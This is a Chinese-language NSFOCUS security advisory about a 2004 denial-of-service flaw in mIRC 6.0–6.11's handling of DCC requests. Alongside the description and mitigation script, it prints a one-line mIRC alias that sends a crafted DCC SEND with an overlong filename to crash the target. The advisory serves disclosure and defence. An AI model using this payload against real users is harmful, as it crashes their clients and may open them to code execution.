安全研究
安全漏洞
mIRC DCC Get对话远程拒绝服务攻击漏洞
发布日期:2004-01-26
更新日期:2004-02-04
受影响系统:Khaled Mardam-Bey mIRC 6.11
Khaled Mardam-Bey mIRC 6.1
Khaled Mardam-Bey mIRC 6.03
Khaled Mardam-Bey mIRC 6.02
Khaled Mardam-Bey mIRC 6.01
Khaled Mardam-Bey mIRC 6.0
描述:
BUGTRAQ ID:
9492
mIRC是一款流行的基于Windows的聊天程序。
mIRC不正确处理DCC Get对话请求,远程攻击者可以利用这个漏洞进行拒绝服务攻击,存在执行任意代码可能。
提交特殊的DCC Get对话请求,在特殊情况下,可使应用程序崩溃,虽然没有得到证实,但此漏洞可能导致以mIRC进程权限执行任意代码。
<*来源:MASTER VI (
admin@viperion.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
MASTER VI (
admin@viperion.net)提供了如下测试方法:
alias mirc612 { echo -a *** Sending exploit to $$1 | .raw PRIVMSG $$1 $+(:,$chr(1),DCC) send $str($rand(a,z) $+ $chr(256),250) $+ 0 $+ .txt 2130706433 $+(8192,$chr(1)) }
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在"remotes"段中粘贴如下内容:
ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick tried to crash you with an illegal dcc send of $nopath($filename) | halt }
* 通过使用/ignore -d *或/ignore -wd *命令忽略所有DCC请求。
厂商补丁:
Khaled Mardam-Bey
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mirc.com/index.html浏览次数:2692
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |